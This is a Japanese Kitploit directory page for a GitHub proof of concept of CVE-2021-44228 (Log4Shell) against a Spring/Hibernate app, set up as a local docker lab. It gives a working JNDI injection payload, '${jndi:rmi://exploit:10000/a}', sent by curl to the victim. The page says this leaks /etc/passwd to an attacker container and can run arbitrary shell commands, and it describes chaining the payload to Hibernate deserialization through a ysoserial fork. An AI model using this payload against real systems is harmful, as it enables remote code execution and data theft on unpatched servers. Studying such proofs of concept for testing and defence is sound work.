Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2021-44228--spring-hibernate — CVE-2021-44228 POC - Spring / Hibernate | Kitploit
ツール/GitHubGitHub/uint0/cve-2021-44228--spring-hibernate
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubuint0/cve-2021-44228--spring-hibernate

cve-2021-44228--spring-hibernate

CVE-2021-44228 POC - Spring / Hibernate

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
14年前未レビュー

CVE-2021-44228 実証コード - Spring / Hibernate

この実証コードは Spring / Hibernate を使用していますが、rmi -> デシリアライゼーションの同様のアプローチは、あらゆるデシリアライゼーションの脆弱性をトリガーするために使用できます

TL;DR

root@kitploit:~
$ docker-compose up
$ curl -X POST -H 'Content-Type: text/plain' localhost:8080 --data-binary '${jndi:rmi://exploit:10000/a}'

被害者の /etc/passwd の内容が attacker コンテナのログに表示されるはずです。exploit サービスのコマンドを置き換えて、被害者上で任意のシェルコマンドを実行できます。

Victim

被害者は、標準の starter spring app を実行しており、「Spring Data JPA」(Hibernate用)、「Spring Web」、「H2」(データストア)の依存関係があります。これに加えて、以下の2つの変更のみが行われています。

  1. テストの削除
  2. slf4j ロガーを脆弱性のある log4j に置き換え

すべての依存関係は最新です。特別なフラグは有効になっていません。

被害者は、/ に POST 可能なエンドポイントを公開しており、リクエストをログに記録します。

Exploit

このエクスプロイトは、Hibernate エクスプロイトジェネレータを使用した ysoserial のフォークに依存しています。最新バージョンの Hibernate でエクスプロイトを動作させるには、ysoserial を再コンパイルする必要があります。

ツールをダウンロード